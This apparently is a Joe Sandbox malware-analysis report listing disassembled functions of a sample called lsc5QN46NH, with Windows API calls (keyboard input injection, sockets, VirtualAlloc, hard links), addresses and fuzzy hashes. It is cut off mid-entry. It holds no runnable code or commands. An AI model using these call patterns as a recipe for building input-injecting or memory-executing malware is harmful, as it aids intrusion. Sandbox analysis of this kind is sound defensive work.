                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                • Opcode ID: a0a3fe70dc5e8f76db8b8d0c62624ccc4d1a604e4b5ccb8b59f78ff96b8ca3d0
                                                                                                                • Instruction ID: 643e0cb89ff2b79f36ccf32bce27b02867af40ffacfac7e8d72fcf4d322831e8
                                                                                                                • Opcode Fuzzy Hash: a0a3fe70dc5e8f76db8b8d0c62624ccc4d1a604e4b5ccb8b59f78ff96b8ca3d0
                                                                                                                • Instruction Fuzzy Hash: C8D01274560713DFD7209F35D81C64676DAAF05751B52C93994C5D6650EA70C4D0C760
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime__swprintf
                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                • API String ID: 2070861257-2409531811
                                                                                                                • Opcode ID: 2af1eecd1241cd247f86ba4f6c99a86e5691a3cd6a07459e6a6b6b025e6508cc
                                                                                                                • Instruction ID: ec9c36159c74691666c3b750eb409d581c95ba165344c170fa17cc9f5f589431
                                                                                                                • Opcode Fuzzy Hash: 2af1eecd1241cd247f86ba4f6c99a86e5691a3cd6a07459e6a6b6b025e6508cc
                                                                                                                • Instruction Fuzzy Hash: 7BD017B1844118FACB54AB9098888FA737EEB0A311F200562B512A6080E2269BD6EB25
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e4ef2cd05f147fedc889e15fa147ef0967b083d26cee3ea4d175a4b81814ca5d
                                                                                                                • Instruction ID: 67e3774072df05e8cc1e11ff5e48736c2f2ced4932e346568cb723b686c33a36
                                                                                                                • Opcode Fuzzy Hash: e4ef2cd05f147fedc889e15fa147ef0967b083d26cee3ea4d175a4b81814ca5d
                                                                                                                • Instruction Fuzzy Hash: 6DC14874A04216AFCB14CFA4D884AAEBBF6FF48715F148598EC05EB251D730EE85DB90
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0067E0BE
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0067E101
                                                                                                                  • Part of subcall function 0067D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067D7C5
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0067E301
                                                                                                                • _memmove.LIBCMT ref: 0067E314
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3659485706-0
                                                                                                                • Opcode ID: c3d27c6f2c51794a5072e3b4fd7bab2aa48ec106d76a15d1e41450fe77d8b1a6
                                                                                                                • Instruction ID: d65e7e619850323f24eaeca3e7d87f6e3efd854b2019b9407fff94672138222f
                                                                                                                • Opcode Fuzzy Hash: c3d27c6f2c51794a5072e3b4fd7bab2aa48ec106d76a15d1e41450fe77d8b1a6
                                                                                                                • Instruction Fuzzy Hash: 13C14871A083019FC744DF28C48196ABBE6FF89714F14896EF8999B352D731E94ACF81
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 006780C3
                                                                                                                • CoUninitialize.OLE32 ref: 006780CE
                                                                                                                  • Part of subcall function 0065D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0065D5D4
                                                                                                                • VariantInit.OLEAUT32(?), ref: 006780D9
                                                                                                                • VariantClear.OLEAUT32(?), ref: 006783AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 780911581-0
                                                                                                                • Opcode ID: c19a890bd0353fb9cb2d8061d9ec287de62af79219a67dd536b79c8565348aac
                                                                                                                • Instruction ID: 943fec30a074ce9ba93e71e0c43ba829975e661763329b6c94c476b86b7dbaf0
                                                                                                                • Opcode Fuzzy Hash: c19a890bd0353fb9cb2d8061d9ec287de62af79219a67dd536b79c8565348aac
                                                                                                                • Instruction Fuzzy Hash: 72A19B752447019FCB44DF64C485B2AB7E6BF89324F04894CF99A9B3A2CB30ED05CB96
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2808897238-0
                                                                                                                • Opcode ID: 9aa110c7c29b32d6b3b947ce478c6f5ed03fb9767d9eea7ab49fa550d0fe403b
                                                                                                                • Instruction ID: e0a649774496ae563449df09091a2ac1dd85c83a44c78598cbc84986764528f2
                                                                                                                • Opcode Fuzzy Hash: 9aa110c7c29b32d6b3b947ce478c6f5ed03fb9767d9eea7ab49fa550d0fe403b
                                                                                                                • Instruction Fuzzy Hash: 2C51C2747003029ADF64AF65D891A6AB3E7AF44311F60D81FF996DB392DB30D849CB14
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(0142DCF0,?), ref: 00689863
                                                                                                                • ScreenToClient.USER32(00000002,00000002), ref: 00689896
                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00689903
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3880355969-0
                                                                                                                • Opcode ID: 5270a7ba35c1fb1b156d121d13ef069e3a151c10af665ca6df9c4f11acbc5802
                                                                                                                • Instruction ID: 06e5b21092d0d26af6e3f737111dd6e29e8e7816dd618c34593d1918f57f06a1
                                                                                                                • Opcode Fuzzy Hash: 5270a7ba35c1fb1b156d121d13ef069e3a151c10af665ca6df9c4f11acbc5802
                                                                                                                • Instruction Fuzzy Hash: 1D512C74A00209AFCF14DF54C884ABE7BB6FF55360F188659F9659B3A0D731AD81CBA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00659AD2
                                                                                                                • __itow.LIBCMT ref: 00659B03
                                                                                                                  • Part of subcall function 00659D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00659DBE
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00659B6C
                                                                                                                • __itow.LIBCMT ref: 00659BC3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3379773720-0
                                                                                                                • Opcode ID: 457d3697dd4cacef5eea307f82d4b6601e95c1565a03894fa8b0cd1c2f5ed8db
                                                                                                                • Instruction ID: adc879716690025d6631033fcc094aa624f7116f17d1d84be96002dd518eed0b
                                                                                                                • Opcode Fuzzy Hash: 457d3697dd4cacef5eea307f82d4b6601e95c1565a03894fa8b0cd1c2f5ed8db
                                                                                                                • Instruction Fuzzy Hash: E941AE70A40208ABEF15EF54D845BEF7BBAEF44715F000069FD05A3291DB70AE48CBA5
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 006769D1
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 006769E1
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00676A45
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00676A51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2214342067-0
                                                                                                                • Opcode ID: 5ecaf137b2f5bfe5bc5b8a2628c9ca8cbffc0e1ea5bdaece06cc122dd17ae489
                                                                                                                • Instruction ID: 9db14234506f73e6ea38597f544a43e63bd4ca8643808edcb63c90b34c74df8c
                                                                                                                • Opcode Fuzzy Hash: 5ecaf137b2f5bfe5bc5b8a2628c9ca8cbffc0e1ea5bdaece06cc122dd17ae489
                                                                                                                • Instruction Fuzzy Hash: D241A275780600AFEBA4AF24CC86F6A77A69F44B14F04C55CFA59AB3C3DA709D008B95
                                                                                                                APIs
                                                                                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0068F910), ref: 006764A7
                                                                                                                • _strlen.LIBCMT ref: 006764D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4218353326-0
                                                                                                                • Opcode ID: 11cdaea621bf16d6d0c527b139693c667ec4b38bf2306ffa9b2ad0173c59bb16
                                                                                                                • Instruction ID: b09b65fb586dec94f8863ab7bb614694c64a85cafa9b2c04b69b0e6a717513ce
                                                                                                                • Opcode Fuzzy Hash: 11cdaea621bf16d6d0c527b139693c667ec4b38bf2306ffa9b2ad0173c59bb16
                                                                                                                • Instruction Fuzzy Hash: 7C41A271600504ABDB58EBA8EC85EAFB7ABAF04310F14C159F91A972D3EB30AD44CB54
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0066B89E
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0066B8C4
                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0066B8E9
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0066B915
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                • Opcode ID: 719b9c55ff4be241197d497091a3b3d3598827f43eb5e5fa65e09f6660e53571
                                                                                                                • Instruction ID: 2e779b94a724adada98871e30b4fbde3078c06228609cf9c97d6e8fccc9a2137
                                                                                                                • Opcode Fuzzy Hash: 719b9c55ff4be241197d497091a3b3d3598827f43eb5e5fa65e09f6660e53571
                                                                                                                • Instruction Fuzzy Hash: DB411A35600510DFCB55EF25C484A5ABBE3AF4A310F09C498EC4AAB3A2CB30FD41CBA5
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006888DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: d213fd217287f8782743ee65bd136799504ecb46a192edc36c8fc497da4f7ab6
                                                                                                                • Instruction ID: 0b1f4f10c9e79ca9cb8cd71ddd40874ca7c1a5cb017a12ac7be82d5d1b1a639c
                                                                                                                • Opcode Fuzzy Hash: d213fd217287f8782743ee65bd136799504ecb46a192edc36c8fc497da4f7ab6
                                                                                                                • Instruction Fuzzy Hash: B3318E74640109BEEF24BB58CC45BF977A7EB09310FD44316FA15E72A1CA70A9809796
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0068AB60
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0068ABD6
                                                                                                                • PtInRect.USER32(?,?,0068C014), ref: 0068ABE6
                                                                                                                • MessageBeep.USER32(00000000), ref: 0068AC57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: 7e6b0ccea57fd8e5d7a3cc67f85beb6acda07d7c087c45fd55a91809a12ad4e3
                                                                                                                • Instruction ID: dff229039a271e27ec8ce69baf1e53426d6a1449cb78615f64969089ea20779b
                                                                                                                • Opcode Fuzzy Hash: 7e6b0ccea57fd8e5d7a3cc67f85beb6acda07d7c087c45fd55a91809a12ad4e3
                                                                                                                • Instruction Fuzzy Hash: 62416E30600519DFEB11EF98D884BA97BF7FF49310F1892AAE9159B361D730E841CB92
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00660B27
                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00660B43
                                                                                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00660BA9
                                                                                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00660BFB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: d75725ce2a0c10c29bd626e61c38c4671b834188b7ca5178ae6fc361053763b7
                                                                                                                • Instruction ID: 790166c867922ffc368f0db28965412584c25028818b0cd1fac75fcc2b1aebd7
                                                                                                                • Opcode Fuzzy Hash: d75725ce2a0c10c29bd626e61c38c4671b834188b7ca5178ae6fc361053763b7
                                                                                                                • Instruction Fuzzy Hash: FD314870940208AEFB308B29CC05BFBBBABEB55319F18837AE481522D1C7B68D859755
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00660C66
                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00660C82
                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 00660CE1
                                                                                                                • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00660D33
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 9d414fd8b52ac999f3f009f6083668bb01566a12df1e395b7df7d939fe222983
                                                                                                                • Instruction ID: d08df5a714c1646b420ab6d3d30345a6b7b8d4d82118e63e66e2500706d70f98
                                                                                                                • Opcode Fuzzy Hash: 9d414fd8b52ac999f3f009f6083668bb01566a12df1e395b7df7d939fe222983
                                                                                                                • Instruction Fuzzy Hash: 263135309402486EFF348B648805BFFBB67EF49310F04433AE481522D1C3759D45C796
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006361FB
                                                                                                                • __isleadbyte_l.LIBCMT ref: 00636229
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00636257
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0063628D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 2b5bf60b27f7ce122eb42238db54e07f3e45c8d62758361090037af689159c3c
                                                                                                                • Instruction ID: da4b1319bb27a40ace3eab1b1c55a0309c40f03b5c12237babdd9a56d975d5ef
                                                                                                                • Opcode Fuzzy Hash: 2b5bf60b27f7ce122eb42238db54e07f3e45c8d62758361090037af689159c3c
                                                                                                                • Instruction Fuzzy Hash: 1731C030604256BFDF218F65CC48BAB7BBAFF42310F168128F86497291DB31DA50DB90
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00684F02
                                                                                                                  • Part of subcall function 00663641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0066365B
                                                                                                                  • Part of subcall function 00663641: GetCurrentThreadId.KERNEL32 ref: 00663662
                                                                                                                  • Part of subcall function 00663641: AttachThreadInput.USER32(00000000,?,00665005), ref: 00663669
                                                                                                                • GetCaretPos.USER32(?), ref: 00684F13
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00684F4E
                                                                                                                • GetForegroundWindow.USER32 ref: 00684F54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                • Opcode ID: 4a1d14332988943ad05474fe470394212723d64b182553490ea2cead552e45ef
